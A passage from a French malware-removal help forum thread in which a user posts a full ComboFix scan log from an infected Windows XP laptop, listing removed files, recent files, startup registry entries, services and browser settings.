      /!\ Ne touche à rien tant que le scan n'est pas terminé. /!\ : risque de figer l'ordinateur (plantage complet)


      ::Si combofix détecte quelque chose et de demande a redémarrer tu acceptes


      @+
      0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. furfande
     
    Re, encore merci de ton aide, combo fix semble avoir suprimmé quelques virus :

    PS : Le virus activex semble programmé pour s'activer une fois chaques jours, si demain j'ai rien c'est bon signe :p

    ComboFix 10-01-17.04 - thibaut 18/01/2010 18:46:02.1.2 - x86
    Microsoft Windows XP Professionnel 5.1.2600.3.1252.33.1036.18.3070.2431 [GMT 1:00]
    Lancé depuis: c:\documents and settings\thibaut\Bureau\asdehi.exe
    AV: avast! antivirus 4.8.1368 [VPS 100118-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}

    AVERTISSEMENT - LA CONSOLE DE RÉCUPÉRATION N'EST PAS INSTALLÉE SUR CETTE MACHINE !!
    .

    (((((((((((((((((((((((((((((((((((( Autres suppressions ))))))))))))))))))))))))))))))))))))))))))))))))
    .

    c:\documents and settings\thibaut\Application Data\BITS
    c:\documents and settings\thibaut\Application Data\BITS\BITS.ini
    c:\documents and settings\thibaut\Application Data\BITS\UPnP.ini
    c:\documents and settings\thibaut\Application Data\Desktopicon
    c:\documents and settings\thibaut\Application Data\inst.exe
    C:\Thumbs.db
    c:\windows\system32\Thumbs.db

    c:\windows\system32\drivers\asyncmac.sys était absent
    Copie restaurée à partir de - c:\windows\system32\dllcache\asyncmac.sys

    .
    ((((((((((((((((((((((((((((( Fichiers créés du 2009-12-18 au 2010-01-18 ))))))))))))))))))))))))))))))))))))
    .

    2010-01-18 17:52 . 2008-04-13 10:57 14336 -c--a-w- c:\windows\system32\dllcache\asyncmac.sys
    2010-01-18 17:52 . 2008-04-13 10:57 14336 ----a-w- c:\windows\system32\drivers\asyncmac.sys
    2010-01-17 18:06 . 2010-01-17 18:10 -------- d-----w- C:\rsit
    2010-01-17 17:58 . 2010-01-17 17:58 130258400 ----a-w- C:\Sauv.reg
    2010-01-17 09:32 . 2010-01-17 09:32 -------- d-----w- c:\windows\system32\wbem\Repository
    2010-01-16 11:43 . 2010-01-16 11:43 148 ----a-w- c:\windows\system32\fjhdyfhsn.bat
    2010-01-14 19:54 . 2010-01-14 19:54 -------- d--h--w- c:\windows\PIF
    2010-01-14 19:21 . 2010-01-14 19:21 -------- d-----w- c:\documents and settings\thibaut\Application Data\Malwarebytes
    2010-01-14 19:21 . 2010-01-07 15:07 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
    2010-01-14 19:20 . 2010-01-14 19:20 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes
    2010-01-14 19:20 . 2010-01-14 21:50 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
    2010-01-14 19:20 . 2010-01-07 15:07 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
    2010-01-14 18:07 . 2010-01-14 18:07 -------- d-----w- c:\program files\Enigma Software Group
    2010-01-14 17:48 . 2010-01-14 18:26 -------- d-----w- c:\windows\LastGood(2)
    2010-01-14 17:47 . 2010-01-14 17:47 -------- d-----w- c:\windows\system32\config\systemprofile\IETldCache
    2010-01-09 17:35 . 2010-01-14 19:10 -------- d-----w- C:\wamp
    2009-12-31 16:49 . 2009-12-31 16:49 -------- d-----w- c:\documents and settings\thibaut\Application Data\InterVideo
    2009-12-29 16:47 . 2009-12-29 17:00 -------- d-----w- c:\program files\Mihov Mail Sender
    2009-12-28 00:10 . 2009-11-12 09:25 30024 ----a-w- c:\windows\system32\uxtuneup.dll
    2009-12-27 21:00 . 2009-12-27 21:00 -------- d-----w- c:\documents and settings\LocalService\Application Data\TuneUp Software
    2009-12-27 20:57 . 2009-11-12 09:30 29512 ----a-w- c:\windows\system32\TURegOpt.exe
    2009-12-27 20:56 . 2010-01-15 07:10 -------- d-----w- c:\program files\TuneUp Utilities 2010
    2009-12-27 20:56 . 2009-12-27 20:56 -------- d-sh--w- c:\documents and settings\All Users\Application Data\{D3742F82-1C1A-4DCC-ABBD-0E7C3C0185CC}
    2009-12-27 13:51 . 2009-12-27 14:26 -------- d-----w- c:\documents and settings\thibaut\Application Data\CheckPoint
    2009-12-27 13:49 . 2009-12-27 14:27 -------- d-----w- c:\program files\CheckPoint
    2009-12-27 13:49 . 2009-12-27 13:49 4212 ---ha-w- c:\windows\system32\zllictbl.dat
    2009-12-26 18:21 . 2009-12-26 18:21 4 ----a-w- c:\windows\system32\aspdict-en.dat
    2009-12-26 18:21 . 2009-12-26 18:21 16 ----a-w- c:\windows\system32\asdict.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\wsbl.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\ph_white.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\ph_summ.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\ph_black.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\pcwords2.dat
    2009-12-26 18:09 . 2009-12-26 18:09 0 ----a-w- c:\windows\system32\pcwords.dat
    2009-12-26 17:55 . 2009-12-27 13:54 -------- d-----w- c:\documents and settings\All Users\Application Data\BitDefender
    2009-12-26 17:55 . 2009-12-26 17:55 -------- d-----w- c:\program files\BitDefender
    2009-12-26 17:55 . 2009-12-27 13:54 -------- d-----w- c:\program files\Fichiers communs\BitDefender
    2009-12-26 10:19 . 2009-12-26 10:19 -------- d-----w- c:\program files\Logitech
    2009-12-25 21:17 . 2009-12-25 21:17 -------- d-----w- c:\documents and settings\thibaut\Local Settings\Application Data\Logitech
    2009-12-25 21:13 . 2009-12-26 10:19 -------- d-----w- c:\program files\Fichiers communs\Logitech
    2009-12-25 19:49 . 2007-06-29 13:23 53248 ----a-w- c:\windows\system32\IoctlSvc.exe
    2009-12-25 19:49 . 2009-12-25 19:49 -------- d-----w- c:\documents and settings\thibaut\Application Data\Transcend
    2009-12-25 19:49 . 2009-09-18 12:32 176128 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\SJelite3Launch.exe
    2009-12-25 19:49 . 2009-09-18 12:30 53416 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\PLIoctlInstaller.exe
    2009-12-25 19:49 . 2008-06-12 12:29 69632 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\JMUsbDll.dll
    2009-12-25 19:49 . 2007-06-29 13:23 57344 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\PL2571.dll
    2009-12-25 19:49 . 2007-06-29 13:23 53248 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\IoctlSvc.exe
    2009-12-25 19:49 . 2007-06-29 13:23 114688 ----a-w- c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\PLX507.DLL
    2009-12-25 12:51 . 2009-12-25 12:51 -------- d-----w- c:\program files\Lavalys
    2009-12-24 11:50 . 2009-12-24 11:55 -------- d-----w- c:\documents and settings\thibaut\Local Settings\Application Data\Rockstar Games

    .
    (((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2010-01-18 17:43 . 2009-11-22 11:15 12 ----a-w- c:\windows\bthservsdp.dat
    2010-01-18 17:43 . 2009-06-16 16:41 -------- d-----w- c:\documents and settings\thibaut\Application Data\uTorrent
    2010-01-17 19:12 . 2009-09-25 16:36 -------- d-----w- c:\program files\Spybot - Search & Destroy
    2010-01-17 18:04 . 2009-06-05 14:07 -------- d-----w- c:\program files\Trend Micro
    2010-01-16 17:26 . 2008-05-08 06:46 85394 ----a-w- c:\windows\system32\perfc00C.dat
    2010-01-16 17:26 . 2008-05-08 06:46 510528 ----a-w- c:\windows\system32\perfh00C.dat
    2010-01-16 16:11 . 2009-01-26 20:10 -------- d-----w- c:\documents and settings\thibaut\Application Data\dvdcss
    2010-01-15 18:22 . 2009-03-09 18:38 189184 ----a-w- c:\windows\system32\PnkBstrB.exe
    2010-01-15 16:41 . 2009-03-09 18:39 138064 ----a-w- c:\windows\system32\drivers\PnkBstrK.sys
    2010-01-14 17:47 . 2010-01-14 17:47 20 ----a-w- c:\windows\system32\config\systemprofile\Application Data\fvgqad.dat
    2010-01-09 18:11 . 2009-10-16 19:33 -------- d-----w- c:\documents and settings\thibaut\Application Data\FileZilla
    2010-01-03 21:21 . 2009-11-21 13:15 391328 ----a-w- c:\documents and settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
    2009-12-30 15:05 . 2009-11-18 18:43 -------- d-----w- c:\program files\Call of Duty Modern Warfare 2
    2009-12-28 10:28 . 2009-03-08 19:41 2287104 -c--a-w- c:\windows\system32\TUKernel.exe
    2009-12-28 10:27 . 2009-03-08 19:44 4283904 ----a-w- c:\documents and settings\All Users\Application Data\TuneUp Software\TuneUp Utilities\WinStyler\tu_logonui.exe
    2009-12-27 21:05 . 2009-03-08 15:03 -------- d-----w- c:\program files\TuneUp Utilities 2009
    2009-12-27 20:56 . 2009-03-08 15:03 -------- d-----w- c:\documents and settings\All Users\Application Data\TuneUp Software
    2009-12-26 18:11 . 2009-08-06 15:34 110984 ------w- c:\windows\system32\drivers\bdfndisf.sys
    2009-12-26 17:55 . 2009-06-04 17:07 -------- d-----w- c:\documents and settings\thibaut\Application Data\Free Download Manager
    2009-12-26 12:55 . 2009-05-07 16:51 -------- d-----w- c:\documents and settings\thibaut\Application Data\Wallpaper
    2009-12-26 12:55 . 2009-05-07 16:51 -------- d-----w- c:\program files\Wallpaper
    2009-12-24 10:46 . 2009-02-07 14:30 -------- d-----w- c:\program files\Rockstar Games
    2009-12-24 10:46 . 2008-05-08 07:43 -------- d--h--w- c:\program files\InstallShield Installation Information
    2009-12-19 17:56 . 2009-12-19 16:41 -------- d-----w- c:\program files\valve
    2009-12-18 20:42 . 2009-11-08 12:04 -------- d-----w- c:\program files\ma-config.com
    2009-12-18 20:42 . 2009-11-08 12:04 -------- d-----w- c:\documents and settings\All Users\Application Data\ma-config.com
    2009-12-18 20:35 . 2009-12-18 20:26 -------- d-----w- c:\documents and settings\All Users\Application Data\inf
    2009-12-18 20:05 . 2009-12-18 20:05 -------- d-----w- c:\documents and settings\All Users\Application Data\PC Drivers HeadQuarters
    2009-12-18 17:05 . 2009-12-16 19:28 -------- d-----w- c:\documents and settings\All Users\Application Data\River Past G5
    2009-12-18 17:02 . 2009-11-22 18:44 -------- d-----w- c:\program files\Steam
    2009-12-18 15:08 . 2009-12-18 15:08 -------- d-----w- c:\program files\Bohemia Interactive
    2009-12-16 19:28 . 2009-12-16 19:28 -------- d-----w- c:\documents and settings\thibaut\Application Data\River Past G5
    2009-12-16 18:20 . 2009-01-07 16:33 -------- d-----w- c:\program files\Windows Live
    2009-12-16 18:20 . 2009-12-16 18:20 -------- d-----w- c:\program files\Microsoft
    2009-12-16 18:20 . 2009-12-16 18:12 -------- d-----w- c:\program files\Windows Installer Clean Up
    2009-12-16 18:12 . 2009-12-16 18:12 -------- d-----w- c:\program files\MSECACHE
    2009-12-14 20:19 . 2009-12-14 20:19 -------- d-----w- c:\program files\CPUID
    2009-12-10 20:11 . 2009-12-04 21:45 -------- d-----w- c:\program files\CamStudio
    2009-12-02 13:56 . 2009-11-07 11:45 1 ----a-w- c:\documents and settings\thibaut\Application Data\OpenOffice.org\3\user\uno_packages\cache\stamp.sys
    2009-11-26 19:11 . 2009-11-26 19:11 -------- d-----w- c:\documents and settings\All Users\Application Data\ATI
    2009-11-26 19:04 . 2009-11-26 19:01 -------- d-----w- c:\program files\ATI Technologies
    2009-11-25 20:06 . 2009-11-24 18:05 -------- d-----w- c:\documents and settings\thibaut\Application Data\Sony Corporation
    2009-11-24 23:54 . 2009-01-07 16:37 1280480 ----a-w- c:\windows\system32\aswBoot.exe
    2009-11-24 23:51 . 2009-01-07 16:37 93424 ----a-w- c:\windows\system32\drivers\aswmon.sys
    2009-11-24 23:50 . 2009-01-07 16:37 94160 ----a-w- c:\windows\system32\drivers\aswmon2.sys
    2009-11-24 23:50 . 2009-01-07 16:37 114768 ----a-w- c:\windows\system32\drivers\aswSP.sys
    2009-11-24 23:50 . 2009-01-07 16:37 20560 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys
    2009-11-24 23:49 . 2009-01-07 16:37 48560 ----a-w- c:\windows\system32\drivers\aswTdi.sys
    2009-11-24 23:48 . 2009-01-07 16:37 23120 ----a-w- c:\windows\system32\drivers\aswRdr.sys
    2009-11-24 23:47 . 2009-01-07 16:37 27408 ----a-w- c:\windows\system32\drivers\aavmker4.sys
    2009-11-24 23:47 . 2009-01-07 16:37 97480 ----a-w- c:\windows\system32\AvastSS.scr
    2009-11-24 18:20 . 2009-09-06 15:47 -------- d-----w- c:\program files\eMule
    2009-11-24 18:06 . 2009-11-24 18:06 -------- d-----w- c:\documents and settings\All Users\Application Data\Sony Corporation
    2009-11-24 18:06 . 2009-11-24 17:49 -------- d-----w- c:\program files\Sony
    2009-11-24 18:06 . 2009-11-24 18:05 -------- d-----w- c:\program files\Fichiers communs\Sony Shared
    2009-11-22 11:14 . 2009-11-22 11:14 -------- d-----w- c:\program files\IVT Corporation
    2009-11-22 10:17 . 2008-05-08 07:51 -------- d-----w- c:\program files\Toshiba
    2009-11-22 09:31 . 2009-11-22 09:31 -------- d-----w- c:\program files\Nokia
    2009-11-22 09:31 . 2009-11-22 09:31 -------- d-----w- c:\program files\DIFX
    2009-11-22 09:31 . 2009-11-22 09:31 -------- d-----w- c:\program files\PC Connectivity Solution
    2009-11-22 09:31 . 2009-11-22 09:31 8192 ----a-w- c:\documents and settings\All Users\Application Data\Installations\{83258E90-1F76-4E13-9F60-A0F8ED41E76F}\Installer\CommonCustomActions\UninstCCD.exe
    2009-11-22 09:31 . 2009-11-22 09:31 -------- d-----w- c:\documents and settings\All Users\Application Data\Installations
    2009-11-21 19:31 . 2009-11-21 19:31 -------- d-----w- c:\documents and settings\thibaut\Application Data\MaxTV Technologies
    2009-11-21 19:30 . 2009-11-21 19:30 -------- d-----w- c:\program files\DMV
    2009-11-21 15:58 . 2008-05-08 06:46 471552 ----a-w- c:\windows\AppPatch\aclayers.dll
    2009-11-21 11:32 . 2009-11-21 11:32 -------- d-----w- c:\program files\WBFS
    2009-11-14 08:00 . 2008-05-08 06:46 361600 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2009-11-09 20:55 . 2008-05-08 06:59 75656 -c--a-w- c:\documents and settings\Administrateur\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
    2009-11-09 19:05 . 2009-11-08 20:22 664 ----a-w- c:\windows\system32\d3d9caps.dat
    2009-11-06 21:47 . 2009-11-06 21:47 7424000 ----a-r- c:\documents and settings\thibaut\Application Data\Microsoft\Installer\{0FA44E79-CD7D-4E8D-A2EE-26FE05F509B6}\soffice.exe
    2009-11-06 21:46 . 2009-09-07 18:01 411368 ----a-w- c:\windows\system32\deploytk.dll
    2009-10-29 07:42 . 2008-05-08 06:46 916480 ----a-w- c:\windows\system32\wininet.dll
    2009-10-21 05:39 . 2008-05-08 06:46 75776 ----a-w- c:\windows\system32\strmfilt.dll
    2009-10-21 05:39 . 2008-05-08 06:46 25088 ----a-w- c:\windows\system32\httpapi.dll
    2009-12-26 18:12 . 2009-12-26 18:00 47104 ----a-w- c:\program files\mozilla firefox\components\FFComm.dll
    2006-05-03 10:06 . 2009-06-05 17:01 163328 --sh--r- c:\windows\system32\flvDX.dll
    2007-02-21 11:47 . 2009-06-05 17:01 31232 -csh--r- c:\windows\system32\msfDX.dll
    2008-03-16 13:30 . 2009-06-05 17:01 216064 -csh--r- c:\windows\system32\nbDX.dll
    .

    ------- Sigcheck -------

    [-] 2009-11-14 . 05F3441246BFEDC2A5B12CF827012F7F . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
    [-] 2009-11-14 . EAEC6EA32BDABD7622371C10B8D68A17 . 361344 . . [5.1.2600.5512] . . c:\windows\ServicePackFiles\i386\tcpip.sys
    [-] 2009-11-14 . 05F3441246BFEDC2A5B12CF827012F7F . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
    [7] 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
    [7] 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3GDR\tcpip.sys
    [7] 2008-06-20 . 744E57C99232201AE98C49168B918F48 . 360960 . . [5.1.2600.3394] . . c:\windows\$hf_mig$\KB951748\SP2QFE\tcpip.sys
    [-] 2006-04-20 . B2220C618B42A2212A59D91EBD6FC4B4 . 360576 . . [5.1.2600.2892] . . c:\windows\$hf_mig$\KB917953\SP2QFE\tcpip.sys
    .
    ((((((((((((((((((((((((((((((((( Points de chargement Reg ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
    REGEDIT4

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "MsnMsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2009-07-26 3883856]
    "uTorrent"="c:\program files\uTorrent\uTorrent.exe" [2009-12-10 288560]
    "swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-01-23 68856]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "THotkey"="c:\program files\Toshiba\Toshiba Applet\thotkey.exe" [2008-03-04 360448]
    "TPSMain"="TPSMain.exe" [2007-10-15 266240]
    "avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-11-24 81000]
    "DDWMon"="c:\program files\TOSHIBA\TOSHIBA Direct Disc Writer\\ddwmon.exe" [2007-04-26 495616]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-12-06 1024000]
    "RTHDCPL"="RTHDCPL.EXE" [2008-01-29 16859648]

    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-13 15360]
    "LtMoh"="c:\program files\ltmoh\Ltmoh.exe" [2007-01-09 191552]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon]
    "UIHost"="c:\documents and settings\All Users\Application Data\TuneUp Software\TuneUp Utilities\WinStyler\tu_logonui.exe"

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
    "CTFMON.EXE"=c:\windows\system32\ctfmon.exe
    "swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
    "DAEMON Tools Lite"="c:\program files\DAEMON Tools Lite\daemon.exe" -autorun
    "Outlook Express"=c:\program files\Outlook Express\msimn.exe
    "EA Core"=c:\program files\Electronic Arts\EADM\Core.exe -silent
    "uTorrent"="c:\program files\uTorrent\uTorrent.exe"
    "Free Download Manager"=c:\program files\Free Download Manager\fdm.exe -autorun
    "TOSCDSPD"=c:\program files\TOSHIBA\TOSCDSPD\toscdspd.exe
    "SpybotSD TeaTimer"=c:\program files\Spybot - Search & Destroy\TeaTimer.exe
    "SJelite3Launch"=c:\documents and settings\thibaut\Application Data\Transcend\SJelite3\SJelite3Launch.exe
    "Wallpaper"="c:\program files\Wallpaper\Wallpaper.exe" Starter

    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
    "UnlockerAssistant"="c:\program files\Unlocker\UnlockerAssistant.exe"
    "NDSTray.exe"=NDSTray.exe
    "topi"=c:\program files\TOSHIBA\Toshiba Online Product Information\topi.exe -startup
    "SmoothView"=c:\program files\TOSHIBA\Utilitaire de zoom TOSHIBA\SmoothView.exe
    "HotKeysCmds"=c:\windows\system32\hkcmd.exe
    "Camera Assistant Software"="c:\program files\Camera Assistant Software for Toshiba\traybar.exe" /start
    "IgfxTray"=c:\windows\system32\igfxtray.exe
    "CFSServ.exe"=CFSServ.exe -NoClient
    "Persistence"=c:\windows\system32\igfxpers.exe
    "BluetoothAuthenticationAgent"=rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
    "BtTray"="c:\program files\IVT Corporation\BlueSoleil\BtTray.exe"
    "HP Software Update"=c:\program files\HP\HP Software Update\HPWuSchd2.exe
    "StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
    "Start WingMan Profiler"=c:\program files\Logitech\Gaming Software\LWEMon.exe /noui
    "sysgif32"=c:\windows\TEMP\~TM34.tmp

    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "%windir%\\system32\\sessmgr.exe"=
    "%windir%\\Network Diagnostic\\xpnetdiag.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
    "c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqnrs08.exe"=
    "c:\\Program Files\\Microsoft Games\\Halo\\halo.exe"=
    "c:\\WINDOWS\\system32\\PnkBstrA.exe"=
    "c:\\WINDOWS\\system32\\PnkBstrB.exe"=
    "c:\\Program Files\\Electronic Arts\\EADM\\Core.exe"=
    "c:\\Program Files\\Activision\\Call of Duty 4 - Modern Warfare\\iw3mp.exe"=
    "c:\\Program Files\\Java\\jre1.6.0_03\\launch4j-tmp\\JDownloader.exe"=
    "c:\\WINDOWS\\system32\\java.exe"=
    "c:\\Program Files\\Ubisoft\\Gearbox Software\\Brothers in Arms - Hell's Highway\\Binaries\\biahh.exe"=
    "c:\\Program Files\\Activision\\Call of Duty - World at War\\CoDWaW_1.1_Lanfix.exe"=
    "c:\\Program Files\\Toshiba\\ConfigFree\\CFXFER.exe"=
    "c:\\Program Files\\Sierra Entertainment\\World in Conflict\\wic.exe"=
    "c:\\Program Files\\Sierra Entertainment\\World in Conflict\\wic_online.exe"=
    "c:\\Program Files\\Sierra Entertainment\\World in Conflict\\wic_ds.exe"=
    "c:\\Program Files\\Ubisoft\\Far Cry 2\\bin\\FarCry2.exe"=
    "c:\\Program Files\\Ubisoft\\Far Cry 2\\bin\\FC2Launcher.exe"=
    "c:\\Program Files\\Ubisoft\\Far Cry 2\\bin\\FC2Editor.exe"=
    "c:\\Program Files\\Ubisoft\\Ghost Recon Advanced Warfighter 2\\graw2.exe"=
    "c:\\Program Files\\Ubisoft\\Ghost Recon Advanced Warfighter 2\\graw2_dedicated.exe"=
    "c:\\Program Files\\Free Download Manager\\fdm.exe"=
    "c:\\Program Files\\Microsoft Games\\Halo 2\\halo2.exe"=
    "c:\\Program Files\\Electronic Arts\\Crytek\\Crysis\\Bin32\\Crysis.exe"=
    "c:\\Program Files\\Electronic Arts\\Crytek\\Crysis\\Bin32\\CrysisDedicatedServer.exe"=
    "c:\\Program Files\\EA GAMES\\Battlefield 2\\BF2.exe"=
    "c:\\Program Files\\uTorrent\\uTorrent.exe"=
    "c:\\Program Files\\Windows Live\\Messenger\\wlcsdk.exe"=
    "c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
    "c:\\Program Files\\EA Sports\\NHL 09\\nhl2009.exe"=
    "c:\\Program Files\\IVT Corporation\\BlueSoleil\\BlueSoleilCS.exe"=
    "c:\\Program Files\\Steam\\Steam.exe"=
    "c:\\Program Files\\Call of Duty Modern Warfare 2\\iw4mp.exe"=
    "c:\\Program Files\\eMule\\emule.exe"=
    "c:\\Program Files\\Activision\\Call of Duty - World at War\\CoDWaW.exe"=
    "c:\\Program Files\\Activision\\Call of Duty - World at War\\CoDWaWmp.exe"=
    "c:\\Documents and Settings\\thibaut\\Bureau\\progs\\script\\mirc.exe"=
    "c:\\Program Files\\Rockstar Games\\Rockstar Games Social Club\\RGSCLauncher.exe"=
    "c:\\Program Files\\Rockstar Games\\Grand Theft Auto IV\\LaunchGTAIV.exe"=
    "c:\\Program Files\\Rockstar Games\\Grand Theft Auto IV\\GTAIV.exe"=

    R0 BtHidBus;Bluetooth HID Bus Service;c:\windows\system32\drivers\BtHidBus.sys [31/07/2008 20:45 20616]
    R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [07/01/2009 17:37 114768]
    R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [07/01/2009 17:37 20560]
    R2 BsMobileCS;BsMobileCS;c:\program files\IVT Corporation\BlueSoleil\BsMobileCS.exe [01/08/2008 15:55 143467]
    R2 tdudf;TOSHIBA UDF File System Driver;c:\windows\system32\drivers\tdudf.sys [26/03/2007 11:22 105856]
    R2 trudf;TOSHIBA DVD-RAM UDF File System Driver;c:\windows\system32\drivers\trudf.sys [19/02/2007 11:15 134016]
    R2 TuneUp.UtilitiesSvc;TuneUp Utilities Service;c:\program files\TuneUp Utilities 2010\TuneUpUtilitiesService32.exe [12/11/2009 10:28 1021256]
    R3 FwLnk;FwLnk Driver;c:\windows\system32\drivers\FwLnk.sys [08/05/2008 08:51 5888]
    R3 IvtBtBUs;IVT Bluetooth Bus Service;c:\windows\system32\drivers\IvtBtBus.sys [02/07/2008 14:58 26248]
    R3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files\TuneUp Utilities 2010\TuneUpUtilitiesDriver32.sys [14/10/2009 07:24 10064]
    R3 VCSVADHWSer;Avnex Virtual Audio Device (WDM);c:\windows\system32\drivers\vcsvad.sys [13/05/2009 10:06 17792]
    S0 rdldj;rdldj;c:\windows\system32\drivers\cpemkpix.sys --> c:\windows\system32\drivers\cpemkpix.sys [?]
    S0 sptd;sptd;c:\windows\system32\drivers\sptd.sys [07/02/2009 14:58 721904]
    S3 btnetBUs;Bluetooth PAN Bus Service;c:\windows\system32\drivers\btnetBus.sys [07/12/2008 12:44 29192]
    S3 EverestDriver;Lavalys EVEREST Kernel Driver;c:\program files\Lavalys\EVEREST Ultimate Edition\kerneld.wnt [25/12/2009 13:51 27248]
    S3 maconfservice;Ma-Config Service;c:\program files\ma-config.com\maconfservice.exe [17/12/2009 09:50 243056]

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
    UxTuneUp
    .
    Contenu du dossier 'Tâches planifiées'

    2010-01-18 c:\windows\Tasks\Recherche de problèmes automatique.job
    - c:\program files\TuneUp Utilities 2010\TuneUpSystemStatusCheck.exe [2009-11-12 09:33]
    .
    .
    ------- Examen supplémentaire -------
    .
    uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
    uSearchAssistant = hxxp://www.google.com/ie
    uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
    IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
    IE: Envoyer via Bluetooth - c:\program files\IVT Corporation\BlueSoleil\TransSend\IE\tsinfo.htm
    IE: Envoyer via message(&M)... - c:\program files\IVT Corporation\BlueSoleil\TransSend\IE\tssms.htm
    IE: Liens de téléchargement avec Mega Manager... - c:\progra~1\MEGAUP~1\MEGAMA~1\mm_file.htm
    IE: Tout télécharger avec Free Download Manager - file://c:\program files\Free Download Manager\dlall.htm
    IE: Télécharger avec Free Download Manager - file://c:\program files\Free Download Manager\dllink.htm
    IE: Télécharger la sélection avec Free Download Manager - file://c:\program files\Free Download Manager\dlselected.htm
    IE: Télécharger la vidéo avec Free Download Manager - file://c:\program files\Free Download Manager\dlfvideo.htm
    FF - ProfilePath - c:\documents and settings\thibaut\Application Data\Mozilla\Firefox\Profiles\feiz23oz.default\
    FF - prefs.js: browser.search.selectedEngine - Ask
    FF - prefs.js: browser.startup.homepage - hxxp://www.ask.com/?o=13928&l=dis
    FF - prefs.js: keyword.URL - hxxp://toolbar.ask.com/toolbarv/askRedirect?o=13925&gct=&gc=1&q=
    FF - component: c:\program files\DAEMON Tools Toolbar\FirefoxDTT\components\DTToolbarFF.dll
    FF - component: c:\program files\Free Download Manager\Firefox\Extension\components\vmsfdmff.dll
    FF - component: c:\program files\Mozilla Firefox\components\FFComm.dll
    FF - plugin: c:\program files\ma-config.com\nphardwaredetection.dll
    FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

    ---- PARAMETRES FIREFOX ----
    .
    - - - - ORPHELINS SUPPRIMES - - - -

